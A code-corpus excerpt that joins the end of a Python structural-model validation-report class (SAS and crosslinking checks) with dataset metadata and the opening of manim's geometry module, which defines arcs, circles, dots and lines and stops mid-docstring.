exv_data=I_ev.run_exc_vol_parallel(model_dict)
Template_Dict['excluded_volume']=utility.dict_to_JSlist(exv_data)
Template_Dict['assess_excluded_volume']=utility.exv_readable_format(exv_data)
clashscore=None
rama=None
sidechain=None
return Template_Dict,clashscore,rama,sidechain,exv_data
def run_sas_validation(self,Template_Dict:dict)->(dict,dict,dict):
'''
get sas validation information from SASCIF or JSON files
'''
if self.I.check_for_sas(self.I.get_dataset_comp()):
Template_Dict['sas']=["True"]
I_sas=sas.sas_validation(self.mmcif_file)
Template_Dict['p_val']=utility.dict_to_JSlist(I_sas.get_pvals())
Template_Dict['sasdb_code']=I_sas.get_SASBDB_code()
try:
Template_Dict['parameters_volume']=utility.dict_to_JSlist(I_sas.get_parameters_vol_many())
except:
Template_Dict['parameters_volume']=utility.dict_to_JSlist(I_sas.get_parameters_vol_many_dep())
try:
Template_Dict['parameters_mw']=utility.dict_to_JSlist(I_sas.get_parameters_mw_many())
except:
Template_Dict['parameters_mw']=utility.dict_to_JSlist(I_sas.get_parameters_mw_many_dep())
Template_Dict['pddf_info']=utility.dict_to_JSlist(I_sas.get_pddf_info())
Template_Dict['number_of_fits']=I_sas.get_total_fits()
Template_Dict['chi_table']=utility.dict_to_JSlist(I_sas.get_chi_table())
Template_Dict['rg_table']=utility.dict_to_JSlist(I_sas.get_rg_table_many())
Template_Dict['sasdb_code_fits']=I_sas.get_sasdb_code_fits()
Template_Dict['Data_quality']=utility.get_rg_data(I_sas.get_rg_for_plot())
Template_Dict['validation_input']=utility.get_rg_data_fits(I_sas.get_fits_for_plot())
if len(Template_Dict['validation_input'])<1:
Template_Dict['validation_input']=['Fit of model to data has not been deposited']
sas_data=I_sas.get_rg_for_plot()
sas_fit=I_sas.get_fits_for_plot()
else:
sas_data={}
sas_fit={}
return Template_Dict,sas_data,sas_fit
def run_sas_validation_plots(self,Template_Dict:dict):
'''
get sas validation information from SASCIF or JSON files
'''
if self.I.check_for_sas(self.I.get_dataset_comp()):
Template_Dict['sas']=["True"]
I_sas=sas.sas_validation(self.mmcif_file)
try:
I_sas_plt=validation.sas_plots.sas_validation_plots(self.mmcif_file)
I_sas.modify_intensity()
I_sas.get_pofr_errors()
I_sas_plt.plot_multiple()
I_sas_plt.plot_pf()
I_sas_plt.plot_Guinier()
if Template_Dict['number_of_fits']>0:
I_sas_plt.plot_fits()
except:
pass
def run_cx_validation(self,Template_Dict:dict)->(dict,dict):
if self.I.check_for_cx(self.I.get_dataset_comp()):
Template_Dict['cx']=["True"]
I_cx=cx.cx_validation(self.mmcif_file)
xl_df=I_cx.get_xl_data()
model_df=I_cx.get_df_for_models()
cx_fit=I_cx.get_violation_plot(model_df)
for key,value in cx_fit.items():
Template_Dict['Cx Fit '+str(key)]=value
try:
Template_Dict['validation_input'].extend(utility.get_cx_data_fits(cx_fit))
except:
Template_Dict['validation_input']=utility.get_cx_data_fits(cx_fit)
else:
cx_fit=dict()
return cx_fit,Template_Dict
def run_cx_validation_plots(self,Template_Dict:dict):
if self.I.check_for_cx(self.I.get_dataset_comp()):
Template_Dict['cx']=["True"]
cx_plt=validation.cx_plots.cx_validation_plots(self.mmcif_file)
cx_plt.make_gridplot_intra()
cx_plt.make_gridplot_struc()
cx_plt.plot_distributions()
def run_quality_glance(self,clashscore:dict,rama:dict,
sidechain:dict,exv_data:dict,
sas_data:dict,sas_fit:dict,
cx_fit:dict):
'''
get quality at glance image; will be updated as validation report is updated
'''
I_plt=get_plots.plots(self.mmcif_file)
I_plt.plot_quality_at_glance(clashscore,rama,sidechain,exv_data,sas_data,sas_fit,cx_fit)
def run_supplementary_table(self,
Template_Dict,
location='N/A',
physics='Information about physical principles was not provided',
method_details='N/A',
sampling_validation='N/A',
validation_input=['-'],
cross_validation='N/A',
Data_quality=['-'],
clustering='N/A',
resolution='N/A'):
'''
get supplementary table, will be updated as validation report is updated
'''
if (self.I.get_ensembles() is not None) and (utility.all_same(self.I.get_ensembles()['Clustering method'])):
Template_Dict['clustering']=self.I.get_ensembles()['Clustering method'][0]
elif self.I.get_ensembles() is not None:
Template_Dict['clustering']=', '.join(self.I.get_ensembles()['Clustering method'])
else:
Template_Dict['clustering']='Not applicable'
Template_Dict['location']=location
Template_Dict['complex_name']=self.I.get_struc_title().lower()
Template_Dict['PDB_ID']=self.I.get_id()
Template_Dict['Subunits']=utility.get_subunits(self.I.get_composition())
Template_Dict['datasets']=utility.get_datasets(self.I.get_dataset_details()) if self.I.get_dataset_details() is not None else 'Not provided or used'
Template_Dict['physics']=physics
Template_Dict['software']=utility.get_software(self.I.get_software_comp())+ location
Template_Dict['struc']=self.I.get_atomic_coverage()
Template_Dict['method']=utility.get_method_name(self.I.get_sampling())
Template_Dict['method_type']=utility.get_method_type(self.I.get_sampling())
Template_Dict['method_details']=method_details
Template_Dict['models']=', '.join(self.I.get_ensembles()['Number of models']) if self.I.get_ensembles() is not None else 'Not applicable'
Template_Dict['sampling_validation']=sampling_validation
Template_Dict['feature']=self.I.get_ensembles()['Clustering feature'][0] if self.I.get_ensembles() is not None else 'Not applicable'
Template_Dict['cross_validation']=cross_validation
Template_Dict['model_precision']=', '.join([i+'Å' for i in self.I.get_ensembles()['Cluster precision']]) if self.I.get_ensembles() is not None else 'Model precision can not be calculated with one structure'
Template_Dict['restraint_info']=utility.get_restraints_info(self.I.get_restraints()) if self.I.get_restraints() is not None else 'Not provided or used'
if 'Data_quality' not in list(Template_Dict.keys()):
Template_Dict['Data_quality']=Data_quality
if 'validation_input' not in list(Template_Dict.keys()):
Template_Dict['validation_input']=validation_input
Template_Dict['clustering']=clustering
Template_Dict['resolution']=resolution
return Template_Dict
| 48.466019
| 213
| 0.744324
|
4a07b387c1938b173c936db8cac73e19817fbbe6
| 98,974
|
py
|
Python
|
manim/mobject/geometry.py
|
vagrid/manim
|
723e645abce9c86cdf40c98959157e6ff93896a0
|
[
"MIT"
] | null | null | null |
manim/mobject/geometry.py
|
vagrid/manim
|
723e645abce9c86cdf40c98959157e6ff93896a0
|
[
"MIT"
] | null | null | null |
manim/mobject/geometry.py
|
vagrid/manim
|
723e645abce9c86cdf40c98959157e6ff93896a0
|
[
"MIT"
] | 1
|
2021-08-23T06:57:07.000Z
|
2021-08-23T06:57:07.000Z
|
r"""Mobjects that are simple geometric shapes.
Examples
--------
.. manim:: UsefulAnnotations
:save_last_frame:
class UsefulAnnotations(Scene):
def construct(self):
m0 = Dot()
m1 = AnnotationDot()
m2 = LabeledDot("ii")
m3 = LabeledDot(MathTex(r"\alpha").set_color(ORANGE))
m4 = CurvedArrow(2*LEFT, 2*RIGHT, radius= -5)
m5 = CurvedArrow(2*LEFT, 2*RIGHT, radius= 8)
m6 = CurvedDoubleArrow(ORIGIN, 2*RIGHT)
self.add(m0, m1, m2, m3, m4, m5, m6)
for i, mobj in enumerate(self.mobjects):
mobj.shift(DOWN * (i-3))
"""
__all__ = [
"TipableVMobject",
"Arc",
"ArcBetweenPoints",
"CurvedArrow",
"CurvedDoubleArrow",
"Circle",
"Dot",
"AnnotationDot",
"LabeledDot",
"Ellipse",
"AnnularSector",
"Sector",
"Annulus",
"Line",
"DashedLine",
"TangentLine",
"Elbow",
"Arrow",
"Vector",
"DoubleArrow",
"CubicBezier",
"Polygram",
"Polygon",
"RegularPolygram",
"RegularPolygon",
"Star",
"ArcPolygon",
"ArcPolygonFromArcs",
"Triangle",
"ArrowTip",
"Rectangle",
"Square",
"RoundedRectangle",
"Cutout",
"Angle",
"RightAngle",
"ArrowCircleFilledTip",
"ArrowCircleTip",
"ArrowSquareTip",
"ArrowSquareFilledTip",
]
import math
import warnings
from typing import Iterable, Optional, Sequence
import numpy as np
from colour import Color
from manim.mobject.opengl_mobject import OpenGLMobject
from .. import config, logger
from ..constants import *
from ..mobject.mobject import Mobject
from ..mobject.types.vectorized_mobject import DashedVMobject, VGroup, VMobject
from ..utils.color import *
from ..utils.iterables import adjacent_n_tuples, adjacent_pairs
from ..utils.simple_functions import fdiv
from ..utils.space_ops import (
angle_between_vectors,
angle_of_vector,
compass_directions,
line_intersection,
normalize,
regular_vertices,
rotate_vector,
)
from .opengl_compatibility import ConvertToOpenGL
class TipableVMobject(VMobject, metaclass=ConvertToOpenGL):
"""
Meant for shared functionality between Arc and Line.
Functionality can be classified broadly into these groups:
* Adding, Creating, Modifying tips
- add_tip calls create_tip, before pushing the new tip
into the TipableVMobject's list of submobjects
- stylistic and positional configuration
* Checking for tips
- Boolean checks for whether the TipableVMobject has a tip
and a starting tip
* Getters
- Straightforward accessors, returning information pertaining
to the TipableVMobject instance's tip(s), its length etc
"""
def __init__(
self,
tip_length=DEFAULT_ARROW_TIP_LENGTH,
normal_vector=OUT,
tip_style={},
**kwargs,
):
self.tip_length = tip_length
self.normal_vector = normal_vector
self.tip_style = tip_style
super().__init__(**kwargs)
# Adding, Creating, Modifying tips
def add_tip(self, tip=None, tip_shape=None, tip_length=None, at_start=False):
"""
Adds a tip to the TipableVMobject instance, recognising
that the endpoints might need to be switched if it's
a 'starting tip' or not.
"""
if tip is None:
tip = self.create_tip(tip_shape, tip_length, at_start)
else:
self.position_tip(tip, at_start)
self.reset_endpoints_based_on_tip(tip, at_start)
self.asign_tip_attr(tip, at_start)
self.add(tip)
return self
def create_tip(self, tip_shape=None, tip_length=None, at_start=False):
"""
Stylises the tip, positions it spatially, and returns
the newly instantiated tip to the caller.
"""
tip = self.get_unpositioned_tip(tip_shape, tip_length)
self.position_tip(tip, at_start)
return tip
def get_unpositioned_tip(self, tip_shape=None, tip_length=None):
"""
Returns a tip that has been stylistically configured,
but has not yet been given a position in space.
"""
if tip_shape is None:
tip_shape = ArrowTriangleFilledTip
if tip_length is None:
tip_length = self.get_default_tip_length()
color = self.get_color()
style = {"fill_color": color, "stroke_color": color}
style.update(self.tip_style)
tip = tip_shape(length=tip_length, **style)
return tip
def position_tip(self, tip, at_start=False):
# Last two control points, defining both
# the end, and the tangency direction
if at_start:
anchor = self.get_start()
handle = self.get_first_handle()
else:
handle = self.get_last_handle()
anchor = self.get_end()
tip.rotate(angle_of_vector(handle - anchor) - PI - tip.tip_angle)
tip.shift(anchor - tip.tip_point)
return tip
def reset_endpoints_based_on_tip(self, tip, at_start):
if self.get_length() == 0:
# Zero length, put_start_and_end_on wouldn't work
return self
if at_start:
self.put_start_and_end_on(tip.base, self.get_end())
else:
self.put_start_and_end_on(self.get_start(), tip.base)
return self
def asign_tip_attr(self, tip, at_start):
if at_start:
self.start_tip = tip
else:
self.tip = tip
return self
# Checking for tips
def has_tip(self):
return hasattr(self, "tip") and self.tip in self
def has_start_tip(self):
return hasattr(self, "start_tip") and self.start_tip in self
# Getters
def pop_tips(self):
start, end = self.get_start_and_end()
result = self.get_group_class()()
if self.has_tip():
result.add(self.tip)
self.remove(self.tip)
if self.has_start_tip():
result.add(self.start_tip)
self.remove(self.start_tip)
self.put_start_and_end_on(start, end)
return result
def get_tips(self):
"""
Returns a VGroup (collection of VMobjects) containing
the TipableVMObject instance's tips.
"""
result = self.get_group_class()()
if hasattr(self, "tip"):
result.add(self.tip)
if hasattr(self, "start_tip"):
result.add(self.start_tip)
return result
def get_tip(self):
"""Returns the TipableVMobject instance's (first) tip,
otherwise throws an exception."""
tips = self.get_tips()
if len(tips) == 0:
raise Exception("tip not found")
else:
return tips[0]
def get_default_tip_length(self):
return self.tip_length
def get_first_handle(self):
return self.get_points()[1]
def get_last_handle(self):
return self.get_points()[-2]
def get_end(self):
if self.has_tip():
return self.tip.get_start()
else:
return super().get_end()
def get_start(self):
if self.has_start_tip():
return self.start_tip.get_start()
else:
return super().get_start()
def get_length(self):
start, end = self.get_start_and_end()
return np.linalg.norm(start - end)
class Arc(TipableVMobject):
"""A circular arc.
Examples
--------
A simple arc of angle Pi.
.. manim:: ArcExample
:save_last_frame:
class ArcExample(Scene):
def construct(self):
self.add(Arc(angle=PI))
"""
def __init__(
self,
radius: float = 1.0,
start_angle=0,
angle=TAU / 4,
num_components=9,
arc_center=ORIGIN,
**kwargs,
):
if radius is None: # apparently None is passed by ArcBetweenPoints
radius = 1.0
self.radius = radius
self.num_components = num_components
self.arc_center = arc_center
self.start_angle = start_angle
self.angle = angle
self._failed_to_get_center = False
super().__init__(**kwargs)
def generate_points(self):
self.set_pre_positioned_points()
self.scale(self.radius, about_point=ORIGIN)
self.shift(self.arc_center)
# Points are set a bit differently when rendering via OpenGL.
# TODO: refactor Arc so that only one strategy for setting points
# has to be used.
def init_points(self):
self.set_points(
Arc.create_quadratic_bezier_points(
angle=self.angle,
start_angle=self.start_angle,
n_components=self.num_components,
)
)
self.scale(self.radius, about_point=ORIGIN)
self.shift(self.arc_center)
@staticmethod
def create_quadratic_bezier_points(angle, start_angle=0, n_components=8):
samples = np.array(
[
[np.cos(a), np.sin(a), 0]
for a in np.linspace(
start_angle,
start_angle + angle,
2 * n_components + 1,
)
]
)
theta = angle / n_components
samples[1::2] /= np.cos(theta / 2)
points = np.zeros((3 * n_components, 3))
points[0::3] = samples[0:-1:2]
points[1::3] = samples[1::2]
points[2::3] = samples[2::2]
return points
def set_pre_positioned_points(self):
anchors = np.array(
[
np.cos(a) * RIGHT + np.sin(a) * UP
for a in np.linspace(
self.start_angle, self.start_angle + self.angle, self.num_components
)
]
)
# Figure out which control points will give the
# Appropriate tangent lines to the circle
d_theta = self.angle / (self.num_components - 1.0)
tangent_vectors = np.zeros(anchors.shape)
# Rotate all 90 degrees, via (x, y) -> (-y, x)
tangent_vectors[:, 1] = anchors[:, 0]
tangent_vectors[:, 0] = -anchors[:, 1]
# Use tangent vectors to deduce anchors
handles1 = anchors[:-1] + (d_theta / 3) * tangent_vectors[:-1]
handles2 = anchors[1:] - (d_theta / 3) * tangent_vectors[1:]
self.set_anchors_and_handles(anchors[:-1], handles1, handles2, anchors[1:])
def get_arc_center(self, warning=True):
"""
Looks at the normals to the first two
anchors, and finds their intersection points
"""
# First two anchors and handles
a1, h1, h2, a2 = self.get_points()[:4]
if np.all(a1 == a2):
# For a1 and a2 to lie at the same point arc radius
# must be zero. Thus arc_center will also lie at
# that point.
return a1
# Tangent vectors
t1 = h1 - a1
t2 = h2 - a2
# Normals
n1 = rotate_vector(t1, TAU / 4)
n2 = rotate_vector(t2, TAU / 4)
try:
return line_intersection(line1=(a1, a1 + n1), line2=(a2, a2 + n2))
except Exception:
if warning:
warnings.warn("Can't find Arc center, using ORIGIN instead")
self._failed_to_get_center = True
return np.array(ORIGIN)
def move_arc_center_to(self, point):
self.shift(point - self.get_arc_center())
return self
def stop_angle(self):
return angle_of_vector(self.get_points()[-1] - self.get_arc_center()) % TAU
class ArcBetweenPoints(Arc):
"""
Inherits from Arc and additionally takes 2 points between which the arc is spanned.
Example
--------------------
.. manim:: ArcBetweenPointsExample
class ArcBetweenPointsExample(Scene):
def construct(self):
circle = Circle(radius=2, stroke_color=GREY)
dot_1 = Dot(color=GREEN).move_to([2, 0, 0]).scale(0.5)
dot_1_text = Tex("(2,0)").scale(0.5).next_to(dot_1, RIGHT).set_color(BLUE)
dot_2 = Dot(color=GREEN).move_to([0, 2, 0]).scale(0.5)
dot_2_text = Tex("(0,2)").scale(0.5).next_to(dot_2, UP).set_color(BLUE)
arc= ArcBetweenPoints(start=2 * RIGHT, end=2 * UP, stroke_color=YELLOW)
self.add(circle, dot_1, dot_2, dot_1_text, dot_2_text)
self.play(Create(arc))
"""
def __init__(self, start, end, angle=TAU / 4, radius=None, **kwargs):
if radius is not None:
self.radius = radius
if radius < 0:
sign = -2
radius *= -1
else:
sign = 2
halfdist = np.linalg.norm(np.array(start) - np.array(end)) / 2
if radius < halfdist:
raise ValueError(
"""ArcBetweenPoints called with a radius that is
smaller than half the distance between the points."""
)
arc_height = radius - math.sqrt(radius ** 2 - halfdist ** 2)
angle = math.acos((radius - arc_height) / radius) * sign
Arc.__init__(self, radius=radius, angle=angle, **kwargs)
if angle == 0:
self.set_points_as_corners([LEFT, RIGHT])
self.put_start_and_end_on(start, end)
if radius is None:
center = self.get_arc_center(warning=False)
if not self._failed_to_get_center:
self.radius = np.linalg.norm(np.array(start) - np.array(center))
else:
self.radius = math.inf
class CurvedArrow(ArcBetweenPoints):
def __init__(self, start_point, end_point, **kwargs):
super().__init__(start_point, end_point, **kwargs)
self.add_tip(tip_shape=kwargs.pop("tip_shape", ArrowTriangleFilledTip))
class CurvedDoubleArrow(CurvedArrow):
def __init__(self, start_point, end_point, **kwargs):
if "tip_shape_end" in kwargs:
kwargs["tip_shape"] = kwargs.pop("tip_shape_end")
tip_shape_start = kwargs.pop("tip_shape_start", ArrowTriangleFilledTip)
super().__init__(start_point, end_point, **kwargs)
self.add_tip(at_start=True, tip_shape=tip_shape_start)
class Circle(Arc):
"""A circle.
Parameters
----------
color : :class:`~.Colors`, optional
The color of the shape.
kwargs : Any
Additional arguments to be passed to :class:`Arc`
Examples
--------
.. manim:: CircleExample
:save_last_frame:
class CircleExample(Scene):
def construct(self):
circle_1 = Circle(radius=1.0)
circle_2 = Circle(radius=1.5, color=GREEN)
circle_3 = Circle(radius=1.0, color=BLUE_B, fill_opacity=1)
circle_group = Group(circle_1, circle_2, circle_3).arrange(buff=1)
self.add(circle_group)
"""
def __init__(
self,
radius: float = None,
color=RED,
**kwargs,
):
Arc.__init__(
self,
radius=radius,
start_angle=0,
angle=TAU,
color=color,
**kwargs,
)
def surround(self, mobject, dim_to_match=0, stretch=False, buffer_factor=1.2):
"""Modifies a circle so that it surrounds a given mobject.
Parameters
----------
mobject : :class:`~.Mobject`
The mobject that the circle will be surrounding.
dim_to_match : :class:`int`, optional
buffer_factor : :class:`float`, optional
Scales the circle with respect to the mobject. A `buffer_factor` < 1 makes the circle smaller than the mobject.
stretch : :class:`bool`, optional
Stretches the circle to fit more tightly around the mobject. Note: Does not work with :class:`Line`
Examples
--------
.. manim:: CircleSurround
:save_last_frame:
class CircleSurround(Scene):
def construct(self):
triangle1 = Triangle()
circle1 = Circle().surround(triangle1)
group1 = Group(triangle1,circle1) # treat the two mobjects as one
line2 = Line()
circle2 = Circle().surround(line2, buffer_factor=2.0)
group2 = Group(line2,circle2)
# buffer_factor < 1, so the circle is smaller than the square
square3 = Square()
circle3 = Circle().surround(square3, buffer_factor=0.5)
group3 = Group(square3, circle3)
group = Group(group1, group2, group3).arrange(buff=1)
self.add(group)
"""
# Ignores dim_to_match and stretch; result will always be a circle
# TODO: Perhaps create an ellipse class to handle single-dimension stretching
# Something goes wrong here when surrounding lines?
# TODO: Figure out and fix
self.replace(mobject, dim_to_match, stretch)
self.width = np.sqrt(mobject.width ** 2 + mobject.height ** 2)
return self.scale(buffer_factor)
def point_at_angle(self, angle):
"""Returns the position of a point on the circle.
Parameters
----------
angle : class: `float`
The angle of the point along the circle in radians.
Examples
--------
.. manim:: PointAtAngleExample
:save_last_frame:
class PointAtAngleExample(Scene):
def construct(self):
circle = Circle(radius=2.0)
p1 = circle.point_at_angle(PI/2)
p2 = circle.point_at_angle(270*DEGREES)
s1 = Square(side_length=0.25).move_to(p1)
s2 = Square(side_length=0.25).move_to(p2)
self.add(circle, s1, s2)
Returns
-------
:class:`numpy.ndarray`
The location of the point along the circle's circumference.
"""
start_angle = angle_of_vector(self.get_points()[0] - self.get_center())
return self.point_from_proportion((angle - start_angle) / TAU)
class Dot(Circle):
"""A circle with a very small radius.
Parameters
----------
point : Union[:class:`list`, :class:`numpy.ndarray`], optional
The location of the dot.
radius : Optional[:class:`float`]
The radius of the dot.
stroke_width : :class:`float`, optional
The thickness of the outline of the dot.
fill_opacity : :class:`float`, optional
The opacity of the dot's fill_colour
color : :class:`~.Colors`, optional
The color of the dot.
kwargs : Any
Additional arguments to be passed to :class:`Circle`
Examples
--------
.. manim:: DotExample
:save_last_frame:
class DotExample(Scene):
def construct(self):
dot1 = Dot(point=LEFT, radius=0.08)
dot2 = Dot(point=ORIGIN)
dot3 = Dot(point=RIGHT)
self.add(dot1,dot2,dot3)
"""
def __init__(
self,
point=ORIGIN,
radius: float = DEFAULT_DOT_RADIUS,
stroke_width=0,
fill_opacity=1.0,
color=WHITE,
**kwargs,
):
super().__init__(
arc_center=point,
radius=radius,
stroke_width=stroke_width,
fill_opacity=fill_opacity,
color=color,
**kwargs,
)
class AnnotationDot(Dot):
"""
A dot with bigger radius and bold stroke to annotate scenes.
"""
def __init__(
self,
radius: float = DEFAULT_DOT_RADIUS * 1.3,
stroke_width=5,
stroke_color=WHITE,
fill_color=BLUE,
**kwargs,
):
super().__init__(
radius=radius,
stroke_width=stroke_width,
stroke_color=stroke_color,
fill_color=fill_color,
**kwargs,
)
class LabeledDot(Dot):
"""A :class:`Dot` containing a label in its center.
Parameters
----------
label : Union[:class:`str`, :class:`~.SingleStringMathTex`, :class:`~.Text`, :class:`~.Tex`]
The label of the :class:`Dot`. This is rendered as :class:`~.MathTex`
by default (i.e., when passing a :class:`str`), but other classes
representing rendered strings like :class:`~.Text` or :class:`~.Tex`
can be passed as well.
radius : :class:`float`
The radius of the :class:`Dot`. If ``None`` (the default), the radius
is calculated based on the size of the ``label``.
Examples
--------
.. manim:: SeveralLabeledDots
:save_last_frame:
class SeveralLabeledDots(Scene):
def construct(self):
sq = Square(fill_color=RED, fill_opacity=1)
self.add(sq)
dot1 = LabeledDot(Tex("42", color=RED))
dot2 = LabeledDot(MathTex("a", color=GREEN))
dot3 = LabeledDot(Text("ii", color=BLUE))
dot4 = LabeledDot("3")
dot1.next_to(sq, UL)
dot2.next_to(sq, UR)
dot3.next_to(sq, DL)
dot4.next_to(sq, DR)
self.add(dot1, dot2, dot3, dot4)
"""
def __init__(self, label, radius=None, **kwargs) -> None:
if isinstance(label, str):
from manim import MathTex
rendered_label = MathTex(label, color=BLACK)
else:
rendered_label = label
if radius is None:
radius = 0.1 + max(rendered_label.width, rendered_label.height) / 2
Dot.__init__(self, radius=radius, **kwargs)
rendered_label.move_to(self.get_center())
self.add(rendered_label)
class Ellipse(Circle):
"""A circular shape; oval, circle.
Parameters
----------
width : :class:`float`, optional
The horizontal width of the ellipse.
height : :class:`float`, optional
The vertical height of the ellipse.
kwargs : Any
Additional arguments to be passed to :class:`Circle`
Examples
--------
.. manim:: EllipseExample
:save_last_frame:
class EllipseExample(Scene):
def construct(self):
ellipse_1 = Ellipse(width=2.0, height=4.0, color=BLUE_B)
ellipse_2 = Ellipse(width=4.0, height=1.0, color=BLUE_D)
ellipse_group = Group(ellipse_1,ellipse_2).arrange(buff=1)
self.add(ellipse_group)
"""
def __init__(self, width=2, height=1, **kwargs):
super().__init__(**kwargs)
self.stretch_to_fit_width(width)
self.stretch_to_fit_height(height)
class AnnularSector(Arc):
"""
Parameters
----------
inner_radius
The inside radius of the Annular Sector.
outer_radius
The outside radius of the Annular Sector.
angle
The clockwise angle of the Annular Sector.
start_angle
The starting clockwise angle of the Annular Sector.
fill_opacity
The opacity of the color filled in the Annular Sector.
stroke_width
The stroke width of the Annular Sector.
color
The color filled into the Annular Sector.
Examples
--------
.. manim:: AnnularSectorExample
:save_last_frame:
class AnnularSectorExample(Scene):
def construct(self):
# Changes background color to clearly visualize changes in fill_opacity.
self.camera.background_color = WHITE
# The default parameter start_angle is 0, so the AnnularSector starts from the +x-axis.
s1 = AnnularSector(color=YELLOW).move_to(2 * UL)
# Different inner_radius and outer_radius than the default.
s2 = AnnularSector(inner_radius=1.5, outer_radius=2, angle=45 * DEGREES, color=RED).move_to(2 * UR)
# fill_opacity is typically a number > 0 and <= 1. If fill_opacity=0, the AnnularSector is transparent.
s3 = AnnularSector(inner_radius=1, outer_radius=1.5, angle=PI, fill_opacity=0.25, color=BLUE).move_to(2 * DL)
# With a negative value for the angle, the AnnularSector is drawn clockwise from the start value.
s4 = AnnularSector(inner_radius=1, outer_radius=1.5, angle=-3 * PI / 2, color=GREEN).move_to(2 * DR)
self.add(s1, s2, s3, s4)
"""
def __init__(
self,
inner_radius=1,
outer_radius=2,
angle=TAU / 4,
start_angle=0,
fill_opacity=1,
stroke_width=0,
color=WHITE,
**kwargs,
):
self.inner_radius = inner_radius
self.outer_radius = outer_radius
super().__init__(
start_angle=start_angle,
angle=angle,
fill_opacity=fill_opacity,
stroke_width=stroke_width,
color=color,
**kwargs,
)
def generate_points(self):
inner_arc, outer_arc = [
Arc(
start_angle=self.start_angle,
angle=self.angle,
radius=radius,
arc_center=self.arc_center,
)
for radius in (self.inner_radius, self.outer_radius)
]
outer_arc.reverse_points()
self.append_points(inner_arc.get_points())
self.add_line_to(outer_arc.get_points()[0])
self.append_points(outer_arc.get_points())
self.add_line_to(inner_arc.get_points()[0])
init_points = generate_points
class Sector(AnnularSector):
"""
Examples
--------
.. manim:: ExampleSector
:save_last_frame:
class ExampleSector(Scene):
def construct(self):
sector = Sector(outer_radius=2, inner_radius=1)
sector2 = Sector(outer_radius=2.5, inner_radius=0.8).move_to([-3, 0, 0])
sector.set_color(RED)
sector2.set_color(PINK)
self.add(sector, sector2)
"""
def __init__(self, outer_radius=1, inner_radius=0, **kwargs):
super().__init__(inner_radius=inner_radius, outer_radius=outer_radius, **kwargs)
class Annulus(Circle):
"""Region between two concentric :class:`Circles <.Circle>`.
Parameters
----------
inner_radius
The radius of the inner :class:`Circle`.
outer_radius
The radius of the outer :class:`Circle`.
kwargs : Any
Additional arguments to be passed to :class:`Annulus`
Examples
--------
.. manim:: AnnulusExample
:save_last_frame:
class AnnulusExample(Scene):
def construct(self):
annulus_1 = Annulus(inner_radius=0.5, outer_radius=1).shift(UP)
annulus_2 = Annulus(inner_radius=0.3, outer_radius=0.6, color=RED).next_to(annulus_1, DOWN)
self.add(annulus_1, annulus_2)
"""
def __init__(
self,
inner_radius: Optional[float] = 1,
outer_radius: Optional[float] = 2,
fill_opacity=1,
stroke_width=0,
color=WHITE,
mark_paths_closed=False,
**kwargs,
):
self.mark_paths_closed = mark_paths_closed # is this even used?
self.inner_radius = inner_radius
self.outer_radius = outer_radius
super().__init__(
fill_opacity=fill_opacity, stroke_width=stroke_width, color=color, **kwargs
)
def generate_points(self):
self.radius = self.outer_radius
outer_circle = Circle(radius=self.outer_radius)
inner_circle = Circle(radius=self.inner_radius)
inner_circle.reverse_points()
self.append_points(outer_circle.get_points())
self.append_points(inner_circle.get_points())
self.shift(self.arc_center)
init_points = generate_points
class Line(TipableVMobject):
def __init__(self, start=LEFT, end=RIGHT, buff=0, path_arc=None, **kwargs):
self.dim = 3
self.buff = buff
self.path_arc = path_arc
self.set_start_and_end_attrs(start, end)
super().__init__(**kwargs)
def generate_points(self):
self.set_points_by_ends(
start=self.start, end=self.end, buff=self.buff, path_arc=self.path_arc
)
def set_points_by_ends(self, start, end, buff=0, path_arc=0):
if path_arc:
arc = ArcBetweenPoints(self.start, self.end, angle=self.path_arc)
self.set_points(arc.get_points())
else:
self.set_points_as_corners([start, end])
self.account_for_buff(buff)
init_points = generate_points
def set_path_arc(self, new_value):
self.path_arc = new_value
self.init_points()
def account_for_buff(self, buff):
if buff == 0:
return
#
if self.path_arc == 0:
length = self.get_length()
else:
length = self.get_arc_length()
#
if length < 2 * buff:
return
buff_proportion = buff / length
self.pointwise_become_partial(self, buff_proportion, 1 - buff_proportion)
return self
def set_start_and_end_attrs(self, start, end):
# If either start or end are Mobjects, this
# gives their centers
rough_start = self.pointify(start)
rough_end = self.pointify(end)
vect = normalize(rough_end - rough_start)
# Now that we know the direction between them,
# we can find the appropriate boundary point from
# start and end, if they're mobjects
self.start = self.pointify(start, vect)
self.end = self.pointify(end, -vect)
def pointify(self, mob_or_point, direction=None):
if isinstance(mob_or_point, (Mobject, OpenGLMobject)):
mob = mob_or_point
if direction is None:
return mob.get_center()
else:
return mob.get_boundary_point(direction)
return np.array(mob_or_point)
def put_start_and_end_on(self, start: Sequence[float], end: Sequence[float]):
"""Sets starts and end coordinates of a line.
Examples
--------
.. manim:: LineExample
class LineExample(Scene):
def construct(self):
d = VGroup()
for i in range(0,10):
d.add(Dot())
d.arrange_in_grid(buff=1)
self.add(d)
l= Line(d[0], d[1])
self.add(l)
self.wait()
l.put_start_and_end_on(d[1].get_center(), d[2].get_center())
self.wait()
l.put_start_and_end_on(d[4].get_center(), d[7].get_center())
self.wait()
"""
curr_start, curr_end = self.get_start_and_end()
if np.all(curr_start == curr_end):
# TODO, any problems with resetting
# these attrs?
self.start = start
self.end = end
self.generate_points()
return super().put_start_and_end_on(start, end)
def get_vector(self):
return self.get_end() - self.get_start()
def get_unit_vector(self):
return normalize(self.get_vector())
def get_angle(self):
return angle_of_vector(self.get_vector())
def get_projection(self, point: Sequence[float]) -> Sequence[float]:
"""Returns the projection of a point onto a line.
Parameters
----------
point
The point to which the line is projected.
"""
start = self.get_start()
end = self.get_end()
unit_vect = normalize(end - start)
return start + np.dot(point - start, unit_vect) * unit_vect
def get_slope(self):
return np.tan(self.get_angle())
def set_angle(self, angle, about_point=None):
if about_point is None:
about_point = self.get_start()
self.rotate(
angle - self.get_angle(),
about_point=about_point,
)
return self
def set_length(self, length):
return self.scale(length / self.get_length())
def set_opacity(self, opacity, family=True):
# Overwrite default, which would set
# the fill opacity
self.set_stroke(opacity=opacity)
if family:
for sm in self.submobjects:
sm.set_opacity(opacity, family)
return self
class DashedLine(Line):
"""A dashed :class:`Line`.
Parameters
----------
args : Any
Arguments to be passed to :class:`Line`
dash_length : :class:`float`, optional
The length of each individual dash of the line.
dash_spacing : Optional[:class:`float`]
The spacing between the dashes.
positive_space_ratio : :class:`float`, optional
The ratio of empty space to dash space. Range of 0-1.
kwargs : Any
Additional arguments to be passed to :class:`Line`
Examples
--------
.. manim:: DashedLineExample
:save_last_frame:
class DashedLineExample(Scene):
def construct(self):
# dash_length increased
dashed_1 = DashedLine(config.left_side, config.right_side, dash_length=2.0).shift(UP*2)
# normal
